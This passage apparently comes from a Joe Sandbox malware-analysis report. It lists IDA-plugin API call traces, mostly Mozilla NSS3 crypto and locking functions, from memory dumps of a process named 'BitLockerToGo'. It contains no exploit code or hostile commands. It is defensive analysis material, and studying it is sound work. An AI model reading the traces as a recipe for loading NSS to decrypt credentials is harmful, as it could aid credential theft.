• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                                                                                                                                                                                                                                                          • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 601260978-871931242
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6C7513BC,?,?,?,6C751193), ref: 6C751C6B
                                                                                                                                                                                                                                                                                                                                                          • PR_NewLock.NSS3(?,6C751193), ref: 6C751C7E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7098D0: calloc.MOZGLUE(00000001,00000084,6C630936,00000001,?,6C63102C), ref: 6C7098E5
                                                                                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000,?,6C751193), ref: 6C751C91
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C6321BC), ref: 6C62BB8C
                                                                                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000,?,?,6C751193), ref: 6C751CA7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C62BBEB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C62BBFB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: GetLastError.KERNEL32 ref: 6C62BC03
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C62BC19
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C62BB80: free.MOZGLUE(00000000), ref: 6C62BC22
                                                                                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000,?,?,?,6C751193), ref: 6C751CBE
                                                                                                                                                                                                                                                                                                                                                          • PR_NewCondVar.NSS3(00000000,?,?,?,?,6C751193), ref: 6C751CD4
                                                                                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6C751193), ref: 6C751CFE
                                                                                                                                                                                                                                                                                                                                                          • PR_Lock.NSS3(?,?,?,?,?,?,?,6C751193), ref: 6C751D1A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C631A48), ref: 6C709BB3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C709BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C631A48), ref: 6C709BC8
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6C751193), ref: 6C751D3D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: TlsGetValue.KERNEL32 ref: 6C6EDD8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000,?,6C751193), ref: 6C751D4E
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6C751193), ref: 6C751D64
                                                                                                                                                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6C751193), ref: 6C751D6F
                                                                                                                                                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6C751193), ref: 6C751D7B
                                                                                                                                                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(?,?,?,?,?,6C751193), ref: 6C751D87
                                                                                                                                                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(00000000,?,?,?,6C751193), ref: 6C751D93
                                                                                                                                                                                                                                                                                                                                                          • PR_DestroyLock.NSS3(00000000,?,?,6C751193), ref: 6C751D9F
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,6C751193), ref: 6C751DA8
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3246495057-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(*,kl), ref: 6C6B0C81
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69BE30: SECOID_FindOID_Util.NSS3(6C65311B,00000000,?,6C65311B,?), ref: 6C69BE44
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C688500: SECOID_GetAlgorithmTag_Util.NSS3(6C6895DC,00000000,00000000,00000000,?,6C6895DC,00000000,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C688517
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6B0CC4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FAB0: free.MOZGLUE(?,-00000001,?,?,6C63F673,00000000,00000000), ref: 6C69FAC7
                                                                                                                                                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C6B0CD5
                                                                                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C6B0D1D
                                                                                                                                                                                                                                                                                                                                                          • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C6B0D3B
                                                                                                                                                                                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C6B0D7D
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6B0DB5
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6B0DC1
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6B0DF7
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6B0E05
                                                                                                                                                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C6B0E0F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6895C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C6895E0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6895C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C667F4A,00000000,?,00000000,00000000), ref: 6C6895F5
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6895C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C689609
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6895C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C68961D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6895C0: PK11_GetInternalSlot.NSS3 ref: 6C68970B
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6895C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C689756
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6895C0: PK11_GetIVLength.NSS3(?), ref: 6C689767
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6895C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C68977E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6895C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C68978E
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                                                                                                                                                                                                          • String ID: *,kl$*,kl$-$kl
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3136566230-1984258503
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6C6A5EC0,00000000,?,?), ref: 6C6A5CBE
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6C6A5CD7
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C6A5CF0
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C6A5D09
                                                                                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6C6A5EC0,00000000,?,?), ref: 6C6A5D1F
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6C6A5D3C
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A5D51
                                                                                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6A5D66
                                                                                                                                                                                                                                                                                                                                                          • PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6C6A5D80
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: strncmp$SecureStrdup_Util
                                                                                                                                                                                                                                                                                                                                                          • String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1171493939-3017051476
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C771DE0,?), ref: 6C6A6CFE
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6A6D26
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C6A6D70
                                                                                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000480), ref: 6C6A6D82
                                                                                                                                                                                                                                                                                                                                                          • DER_GetInteger_Util.NSS3(?), ref: 6C6A6DA2
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6A6DD8
                                                                                                                                                                                                                                                                                                                                                          • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C6A6E60
                                                                                                                                                                                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C6A6F19
                                                                                                                                                                                                                                                                                                                                                          • PK11_DigestBegin.NSS3(00000000), ref: 6C6A6F2D
                                                                                                                                                                                                                                                                                                                                                          • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C6A6F7B
                                                                                                                                                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C6A7011
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C6A7033
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C6A703F
                                                                                                                                                                                                                                                                                                                                                          • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C6A7060
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C6A7087
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C6A70AF
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2108637330-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C64AB95,00000000,?,00000000,00000000,00000000), ref: 6C66AF25
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C64AB95,00000000,?,00000000,00000000,00000000), ref: 6C66AF39
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,6C64AB95,00000000,?,00000000,00000000,00000000), ref: 6C66AF51
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C64AB95,00000000,?,00000000,00000000,00000000), ref: 6C66AF69
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C66B06B
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C66B083
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C66B0A4
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C66B0C1
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000), ref: 6C66B0D9
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C66B102
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C66B151
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C66B182
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69FAB0: free.MOZGLUE(?,-00000001,?,?,6C63F673,00000000,00000000), ref: 6C69FAC7
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C66B177
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C64AB95,00000000,?,00000000,00000000,00000000), ref: 6C66B1A2
                                                                                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,6C64AB95,00000000,?,00000000,00000000,00000000), ref: 6C66B1AA
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C64AB95,00000000,?,00000000,00000000,00000000), ref: 6C66B1C2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C691560: TlsGetValue.KERNEL32(00000000,?,6C660844,?), ref: 6C69157A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C691560: EnterCriticalSection.KERNEL32(?,?,?,6C660844,?), ref: 6C69158F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C691560: PR_Unlock.NSS3(?,?,?,?,6C660844,?), ref: 6C6915B2
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4188828017-0
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(#?fl,?,6C65E477,?,?,?,00000001,00000000,?,?,6C663F23,?), ref: 6C662C62
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C,?,6C65E477,?,?,?,00000001,00000000,?,?,6C663F23,?), ref: 6C662C76
                                                                                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(00000000,?,?,6C65E477,?,?,?,00000001,00000000,?,?,6C663F23,?), ref: 6C662C86
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(00000000,?,?,?,?,6C65E477,?,?,?,00000001,00000000,?,?,6C663F23,?), ref: 6C662C93
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: TlsGetValue.KERNEL32 ref: 6C6EDD8C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,6C65E477,?,?,?,00000001,00000000,?,?,6C663F23,?), ref: 6C662CC6
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C65E477,?,?,?,00000001,00000000,?,?,6C663F23,?), ref: 6C662CDA
                                                                                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C65E477,?,?,?,00000001,00000000,?,?,6C663F23), ref: 6C662CEA
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C65E477,?,?,?,00000001,00000000,?), ref: 6C662CF7
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C65E477,?,?,?,00000001,00000000,?), ref: 6C662D4D
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C662D61
                                                                                                                                                                                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?,?), ref: 6C662D71
                                                                                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C662D7E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307AD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307CD
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C5C204A), ref: 6C6307D6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C5C204A), ref: 6C6307E4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,6C5C204A), ref: 6C630864
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C630880
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsSetValue.KERNEL32(00000000,?,?,6C5C204A), ref: 6C6308CB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308D7
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6307A0: TlsGetValue.KERNEL32(?,?,6C5C204A), ref: 6C6308FB
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
• Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
                                                                                                                                                                                                                                                                                                                                                          • String ID: #?fl
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2446853827-3411516467
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6BADB1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69BE30: SECOID_FindOID_Util.NSS3(6C65311B,00000000,?,6C65311B,?), ref: 6C69BE44
                                                                                                                                                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C6BADF4
                                                                                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C6BAE08
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C69B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7718D0,?), ref: 6C69B095
                                                                                                                                                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6BAE25
                                                                                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3 ref: 6C6BAE63
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2AA4,6C6A12D0), ref: 6C6BAE4D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: TlsGetValue.KERNEL32(?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4C97
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4CB0
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C4C70: PR_Unlock.NSS3(?,?,?,?,?,6C5C3921,6C7A14E4,6C70CC70), ref: 6C5C4CC9
                                                                                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6BAE93
                                                                                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C7A2AA4,6C6A12D0), ref: 6C6BAECC
                                                                                                                                                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3 ref: 6C6BAEDE
                                                                                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3 ref: 6C6BAEE6
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6BAEF5
                                                                                                                                                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3 ref: 6C6BAF16
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
